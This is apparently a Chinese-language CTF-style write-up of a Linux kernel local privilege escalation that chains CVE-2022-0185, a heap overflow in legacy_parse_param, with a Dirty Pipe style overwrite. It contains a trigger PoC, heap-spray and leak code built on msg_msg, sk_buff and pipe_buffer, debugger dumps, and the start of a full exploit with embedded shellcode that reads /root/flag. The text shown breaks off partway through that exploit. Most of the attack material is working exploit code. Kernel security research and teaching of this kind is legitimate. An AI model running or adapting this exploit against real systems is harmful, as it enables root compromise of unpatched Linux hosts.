0%

Dirty Pipe+CVE-2022-0185

CVE-2022-0185

1
Linux version 5.11.16 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #2 SMP Thu Nov 30 11:43:05 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

漏洞分析

在漏洞分析开始前需要先了解一下 mount 系统调用:

1
2
3
#include <sys/mount.h>

int mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data);
  • mount 系统调用被用以将文件系统挂载到以 / 为根节点的文件树上

之后有人为 mount 创建了一套更符合 “Linux 一切皆文件” 的 API:

1
2
3
#include <sys/fs.h>

int fsopen(const char *filename, int flags, int mode);
  • fsopen 系统调用则用于打开一个文件系统,并提供一个 “文件系统描述符”(被称为文件系统上下文 filesystem context)

文件系统描述符在内核中的结构体如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
struct fs_context {
const struct fs_context_operations *ops;
struct mutex uapi_mutex; /* Userspace access mutex */
struct file_system_type *fs_type;
void *fs_private; /* The filesystem's context */
void *sget_key;
struct dentry *root; /* The root and superblock */
struct user_namespace *user_ns; /* The user namespace for this mount */
struct net *net_ns; /* The network namespace for this mount */
const struct cred *cred; /* The mounter's credentials */
struct p_log log; /* Logging buffer */
const char *source; /* The source name (eg. dev path) */
void *security; /* Linux S&M options */
void *s_fs_info; /* Proposed s_fs_info */
unsigned int sb_flags; /* Proposed superblock flags (SB_*) */
unsigned int sb_flags_mask; /* Superblock flags that were changed */
unsigned int s_iflags; /* OR'd with sb->s_iflags */
unsigned int lsm_flags; /* Information flags from the fs to the LSM */
enum fs_context_purpose purpose:8;
enum fs_context_phase phase:8; /* The phase the context is in */
bool need_free:1; /* Need to call ops->free() */
bool global:1; /* Goes into &init_user_ns */
bool oldapi:1; /* Coming from mount(2) */
};
  • 核心条目就是 fs_context->fs_private

fsopen 打开一个文件系统后,可以使用 fsconfig 对该文件系统进行配置

1
2
3
#include <sys/fs.h>

int fsconfig(int fd, const char *filename);

若我们给的 cmdFSCONFIG_SET_STRING,则在内核中存在如下调用链:

1
fsconfig -> vfs_fsconfig_locked -> vfs_parse_fs_param

接着就会在 vfs_parse_fs_param 中调用 fs_context->ops->parse_param 函数指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
int ret;

if (!param->key)
return invalf(fc, "Unnamed parameter\n");

ret = vfs_parse_sb_flag(fc, param->key);
if (ret != -ENOPARAM)
return ret;

ret = security_fs_context_parse_param(fc, param);
if (ret != -ENOPARAM)
/* Param belongs to the LSM or is disallowed by the LSM; so
* don't pass to the FS.
*/
return ret;

if (fc->ops->parse_param) {
ret = fc->ops->parse_param(fc, param);
if (ret != -ENOPARAM)
return ret;
}

......

}
EXPORT_SYMBOL(vfs_parse_fs_param);

对于未设置 init_fs_context 的文件系统类型而言其最终会调用 legacy_init_fs_context 进行初始化,其中 fs_context->ops 会被设置为 legacy_fs_context_ops:(其 parse_param 指针对应为 legacy_parse_param 函数)

1
2
3
4
5
6
7
8
static int legacy_init_fs_context(struct fs_context *fc)
{
fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL);
if (!fc->fs_private)
return -ENOMEM;
fc->ops = &legacy_fs_context_ops;
return 0;
}

漏洞就发生在 legacy_parse_param 函数中,在 ctx 中维护一个大小为 PAGE_SIZE 的 buffer 叫做 legacy_data,作用通常是为了存储和处理数据

1
2
3
4
5
struct legacy_fs_context {
char *legacy_data; /* buffer的地址 */
size_t data_size; /* 已拷贝的数据长度 */
enum legacy_fs_param param_type;
};
  • 通常来说 data_size 必须小于 PAGE_SIZE,但漏洞会导致其大于 PAGE_SIZE 发生溢出
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
struct legacy_fs_context *ctx = fc->fs_private;
unsigned int size = ctx->data_size;
size_t len = 0;

......

/* size为已拷贝数据长度,len为待拷贝数据长度 */
if (len > PAGE_SIZE - 2 - size) /* len和size都是无符号,导致整数溢出 */
return invalf(fc, "VFS: Legacy: Cumulative options too large");
if (strchr(param->key, ',') ||
(param->type == fs_value_is_string &&
memchr(param->string, ',', param->size)))
return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
param->key);
if (!ctx->legacy_data) { /* 分配ctx->legacy_data,大小为PAGE_SIZE */
ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);
if (!ctx->legacy_data)
return -ENOMEM;
}

ctx->legacy_data[size++] = ',';
len = strlen(param->key);
memcpy(ctx->legacy_data + size, param->key, len); /* ctx->legacy_data发生溢出 */
size += len;
if (param->type == fs_value_is_string) {
ctx->legacy_data[size++] = '=';
memcpy(ctx->legacy_data + size, param->string, param->size); /* ctx->legacy_data发生溢出 */
size += param->size;
}
ctx->legacy_data[size] = '\0';
ctx->data_size = size;
ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
return 0;
}
  • 如果 size + 2 的值大于 PAGE_SIZE 就会导致溢出检查失效,从而使 len 可以大于剩余未拷贝的数据长度,进而在 cxt->legacy_data 上发生溢出
  • 为了触发漏洞,size 必须大于 4094 但又不能超过 4096,因此 size 只能为 4095

漏洞 Poc 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>

#include "kernelpwn.h"

int fsopen(const char *fs_name, unsigned int flags){
return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fsfd, unsigned int cmd,
const char *key, const void *val, int aux){
return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

int main(int argc, char **argv, char **envp){
int fs_fd;
char* var = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
unshare(CLONE_NEWNS | CLONE_NEWUSER);

fs_fd = fsopen("ext4", 0);
if (fs_fd < 0) {
err_exit("FAILED to fsopen()!");
}

for (int i = 0; i < 255; i++) {
fsconfig(fs_fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
sleep(2);
fsconfig(fs_fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

return 0;
}

入侵思路

出现堆溢出的 slab 是 kmalloc-4k,可以使用自写管道完成提权,但这里使用 Dirty Pipe 的方法(直接修改它的 flags)

首先我们调用 fsopen 并准备好堆溢出:

1
2
3
4
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

然后大量分配如下的 msg:

  • 一个 0x1000 的 struct msg_msg
  • 一个 0x400 的 struct msg_msgseg

那样就有机会使 legacy_data - 0x1000,msg_msg - 0x1000,msg_msgseg - 0x400 物理连续

1
2
3
|page1-------|page2----|page3-----------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgsegB][...][...]
|0x1000------|0x1000---|0x400-------|0x400------|-- ... --|
  • 伙伴系统分配的伙伴页物理地址连续,但不能确定 msg_msgsegB 一定是 msg_msgseg 结构体

然后使用堆溢出来修改 msg_msg.m_ts,读取后续的 msg_msgsegB 并确定该区域为 msg_msgseg 结构体(否则就重新堆喷):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
char buff[0x1000];
logd("[*] prepare fsconfig heap overflow\n"); /* 准备堆溢出(使后续调用的fsconfig触发堆溢出) */
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.m_ts (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.m_ts\n");
memset(buff, 0, sizeof(buff));
strcat(buff, "0000000"); // m_list.next
strcat(buff, "11111111"); // m_list.prev
strcat(buff, "22222222"); // m_type
uint64_t target_size = sizeof(msg_a_oob.mtext);
memcpy(buff + strlen(buff), &target_size, 2);

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", buff, 0); /* 触发堆溢出 */

// recv from buffer to see if leak success
logd("[*] search corrupted msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
ssize_t copy_size = msgrcv(msqid_1[i], &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);

if (copy_size < 0) {
continue;
}
if (copy_size == sizeof(msg_a_oob.mtext)) {
logd("[+] corrupted msg_msg found, id: %d\n", msqid_1[i]);
list1_corrupted_msqid = msqid_1[i];
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
logd("[!] but the next object is not allocated by msg_msgseg\n");
}
break;
}
}

在触发堆溢出的地方断点,打印数据如下:

1
2
3
4
0xffffffff8121f18f <legacy_parse_param+527>    call   memcpy            <memcpy>
dest: 0xffff888004a0b001 ◂— 0xc0ffff888004978e
src: 0xffff888003707780 ◂— 0x3130303030303030 ('00000001')
n: 0x19
1
2
3
4
5
6
7
8
20:0100│ rdi-1 0xffff888004a0b000 —▸ 0xffff888004978e3d ◂— 0x0
21:01080xffff888004a0b008 —▸ 0xffff888004978ec0 —▸ 0xffff888004a0b000 —▸ 0xffff888004978e3d 0
22:01100xffff888004a0b010 ◂— 0x41 /* 'A' */
23:01180xffff888004a0b018 ◂— 0x13c8
24:01200xffff888004a0b020 —▸ 0xffff8880049e7000 ◂— 0x0
25:01280xffff888004a0b028 —▸ 0xffff888004b619d8 ◂— 0x1
26:01300xffff888004a0b030 ◂— 0x13371337
26:01380xffff888004a0b038 ◂— 0x5151515151515151 ('QQQQQQQQ')
1
2
3
4
5
6
20:0100│ rax-1 rdi-1 0xffff888004a0b000 ◂— 0x303030303030303d ('=0000000')
21:01080xffff888004a0b008 ◂— 0x3131313131313131 ('11111111')
22:01100xffff888004a0b010 ◂— 0x3232323232323232 ('22222222')
23:01180xffff888004a0b018 ◂— 0x17c8
24:01200xffff888004a0b020 —▸ 0xffff8880049e7000 ◂— 0x0
25:01280xffff888004a0b028 —▸ 0xffff888004b619d8 ◂— 0x1
  • 可以发现 msg_msg.m_ts 被扩大,使其可以向后溢出泄露地址

当我们确定 msg_msgsegB 为一个 msg_msgseg 结构体后,就可以将除了 msg_msgsegA 的所有 msg_msgseg 都释放掉,然后用 0x400 的 msg_msg 进行堆喷占位:

1
2
3
|page1-------|page2----|page3---------------------------|
[legacy_data][msg_msgA][msg_msgsegA][free slob][...][...]
|0x1000------|0x1000---|0x400-------|0x400----|-- ... --|
1
2
3
|page1-------|page2----|page3--------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgB][...][...]
|0x1000------|0x1000---|0x400-------|0x400---|-- ... --|
  • 这里假设命中 free slob 的 msg_msg 结构体为 msg_msgB

接着就可以泄露 msg_msgB 各个条目的信息了,部分脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_1(); /* msg_msgA的m_type已经被修改,因此不会释放msg_msgA和msg_msgsegA */

// realloc 0x400 slab with msg_msg
logd("[*] alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...\n");
for (int i = 0; i < NUM_MSQIDS_2; i++) {
memset(&msg_b, 0, sizeof(msg_b));
memset(msg_b.mtext, 'W', sizeof(msg_b.mtext));
((int *)&msg_b.mtext)[0] = MSG_SIG;
((int *)&msg_b.mtext)[1] = i;
for (int j = 0; j < 0x10; j++) {
msg_b.mtype = MTYPE_B | (j << 8);
if (msgsnd(msqid_2[i], &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}
}

// hope leak happen
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] bad luck, we don't catch 0x400 msg_msg\n");
clean_msq_2();
return 1;
}
logd("[*] it works :)\n");

list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
list2_leak_mtype = p->m_type;
list2_uaf_msg_addr = p->m_list.prev;
list2_uaf_mtype = p->m_type - 0x0100;
msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
hexdump(msg_a_oob.mtext + sizeof(msg_a.mtext), 0x40);
logd("[+] leak list2_leak_msqid: %d\n", list2_leak_msqid);
logd("[+] leak list2_leak_mtype: 0x%x\n", list2_leak_mtype);
logd("[+] leak list2_uaf_msg_addr: 0x%lx\n", list2_uaf_msg_addr);
logd("[+] leak list2_uaf_mtype: 0x%x\n", list2_uaf_mtype);
}

目前的堆布局如下:

1
2
3
4
5
6
|page1-------|page2----|page3--------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgB][...][...]
|0x1000------|0x1000---|0x400-------|0x400---|-- ... --|
||-(prev)->msg_msgC(地址泄露)
||-(next)->msg_msgD
0x400:msg_msgC->msg_msgB->msg_msgD
  • 通过 msg_msgB 已经泄露了 msg_msgC 的地址,这个 msg 后面会被拿来做 UAF

接下来就可以将 msg_msgD 以及其后的 msg_msg 都释放掉,重新申请一个 msg_msgX,这样X的地址就会写到 msg_msgB 的 next 指针处

  • 受限于场景,需要在 msg_msgX 中部署一个 fake msg_msg,让伪造 msg_msg->next 指向 msg_msgC(后续利用会需要)

接着再次使用 OOB read,就能知道 msg_msgX 的地址,部分脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
logd("[*] alloc msg_msg as heap buffer with known address\n");
{
for (int j = ((list2_leak_mtype + 0x100) >> 8); j < 0x10; j++) {
msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT); /* 释放msg_msgD以及其后的msg_msg */
}
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = list2_uaf_msg_addr; /* 填写msg_msgC(在上一步中泄露) */
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A;

memset(&msg_b, 0, sizeof(msg_b));
memcpy(msg_b.mtext, buff, sizeof(msg_b.mtext));
msg_b.mtype = MTYPE_B;
if (msgsnd(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), 0) < 0) {
/* 申请msg_msgX(msg_msgX的地址将会写在msg_msgB->next处) */
logd("[-] msgsnd() fail\n");
die();
}
}

logd("[*] fetch heap_buffer address by oob read again\n");
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] Recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] I don't think this can happen\n");
die();
}
heap_buffer_addr = p->m_list.next + sizeof(struct msg_msg); /* 泄露msg_msgX的地址,而这里的heap_buffer_addr记录的是fake msg_msg的地址 */
logd("[+] heap_buffer_addr: 0x%lx\n", heap_buffer_addr);
if (strlen((char *)&heap_buffer_addr) < 8) {
logd("[-] pointer can't contain 0x00 bytes\n");
die();
}
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_2();

再次调用 fsopen 准备好堆溢出,这一次修改 m_list.next 使其指向之前部署的 fake msg_msg(而 fake msg_msg->next 则是指向已知地址的 msg_msgC)

接着,将 msg_msgB 从正常的 msg 队列中取出,再堆喷 sk_buff->data 占用 msg_msgB 的空间:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.next (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.next\n");
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr; /* 修改next指针为fake msg_msg */
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A; // with '=' appended
fsconfig(fd, FSCONFIG_SET_STRING, buff, "\x00", 0);

// free uaf msg_msg
logd("[*] free uaf msg_msg from correct msqid\n");
if (msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), list2_uaf_mtype, 0) < 0) {
logd("[-] msgrcv() fail\n");
die();
}

// spary skbuff_data to re-acquire uaf msg_msg and fake the header
logd("[*] spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg\n");
{
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr + 0x80;
p->m_list.prev = heap_buffer_addr + 0x80;
p->m_ts = 0x100;
p->m_type = MTYPE_FAKE;
p->next = 0;
p->security = 0;
spray_skbuff_data(buff, 0x400 - 0x140); /* 利用sk_buff进行占位 */
}

尝试释放 fake msg_msg,就会得到一个 UAF slob:

1
2
3
4
5
6
7
logd("[*] free skbuff_data using fake msqid\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
if (msgrcv(msqid_1[i], &msg_b, sizeof(msg_b.mtext), MTYPE_FAKE, IPC_NOWAIT) > 0) {
logd("[*] freed using msqid %d\n", i);
break;
}
}

最后再往 UAF slob 中堆喷 pipe_buffer,利用 sk_buff 修改 pipe_buffer->flag,之后的步骤就和 DirtyPipe 一样了(往 /bin/busybox 中写入 shellcode)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)
#define NUM_MSQIDS_1 (0x400)
#define NUM_MSQIDS_2 (0x400)
#define MSG_A_RAW_SIZE (0x1400 - 0x8)
#define MSG_A_BUFF_SIZE (MSG_A_RAW_SIZE - sizeof(struct msg_msg))
#define MSG_B_RAW_SIZE (0x400)
#define MSG_B_BUFF_SIZE (MSG_B_RAW_SIZE - sizeof(struct msg_msg))
#define MTYPE_A (0x41)
#define MTYPE_B (0x42)
#define MTYPE_FAKE (0x43)
#define MSG_SIG (0x13371337)
#define NUM_PIPES (0x100)
#define NUM_SOCKETS (4)
#define NUM_SKBUFFS (0x80)

struct list_head {
uint64_t next;
uint64_t prev;
};

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
char mtext[0];
};

struct msg_msgseg {
uint64_t next;
};

struct typ_msg_a {
long mtype;
char mtext[MSG_A_BUFF_SIZE];
};

struct typ_msg_a_oob {
long mtype;
char mtext[MSG_A_BUFF_SIZE + 0x400];
};

struct typ_msg_b {
long mtype;
char mtext[MSG_B_BUFF_SIZE];
};

unsigned char elfcode[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x68, 0x60, 0x66, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01, 0x01, 0x01,
0x48, 0xb8, /* /root */ 0x2f, 0x72, 0x6f, 0x6f, 0x74, /* /flag */ 0x2f, 0x66, 0x6c, 0x50, 0x6a,
0x02, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff,
0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f,
0x99, 0x0f, 0x05, 0xEB
};

int sockfd;
int sock_pairs[NUM_SOCKETS][2];
int msqid_1[NUM_MSQIDS_1];
int msqid_2[NUM_MSQIDS_2];
struct typ_msg_a msg_a = {0};
struct typ_msg_a_oob msg_a_oob = {0};
struct typ_msg_b msg_b = {0};
int list1_corrupted_msqid = -1;
int list2_leak_msqid = -1;
int list2_leak_mtype = 0;
uint64_t list2_uaf_msg_addr = 0;
int list2_uaf_mtype = 0;
uint64_t heap_buffer_addr = 0;
int dummy_pipe[NUM_PIPES][2];

void z() {
logd("waiting...\n");
getchar();
}

void die() {
exit(1);
}

void hexdump(const void *data, size_t size) {
char ascii[17];
size_t i, j;
ascii[16] = '\0';
for (i = 0; i < size; ++i) {
logd("%02X ", ((unsigned char *)data)[i]);
if (((unsigned char *)data)[i] >= ' ' && ((unsigned char *)data)[i] <= '~') {
ascii[i % 16] = ((unsigned char *)data)[i];
} else {
ascii[i % 16] = '.';
}
if ((i + 1) % 8 == 0 || i + 1 == size) {
logd(" ");
if ((i + 1) % 16 == 0) {
logd("| %s \n", ascii);
} else if (i + 1 == size) {
ascii[(i + 1) % 16] = '\0';
if ((i + 1) % 16 <= 8) {
logd(" ");
}
for (j = (i + 1) % 16; j < 16; ++j) {
logd(" ");
}
logd("| %s \n", ascii);
}
}
}
}

void init_unshare() {
int fd;
char buff[0x100];

// strace from `unshare -Ur xxx`
unshare(CLONE_NEWNS | CLONE_NEWUSER);

fd = open("/proc/self/setgroups", O_WRONLY);
snprintf(buff, sizeof(buff), "deny");
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", getuid());
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", getgid());
write(fd, buff, strlen(buff));
close(fd);
}

void init_msq() {
for (int i = 0; i < NUM_MSQIDS_1; i++) {
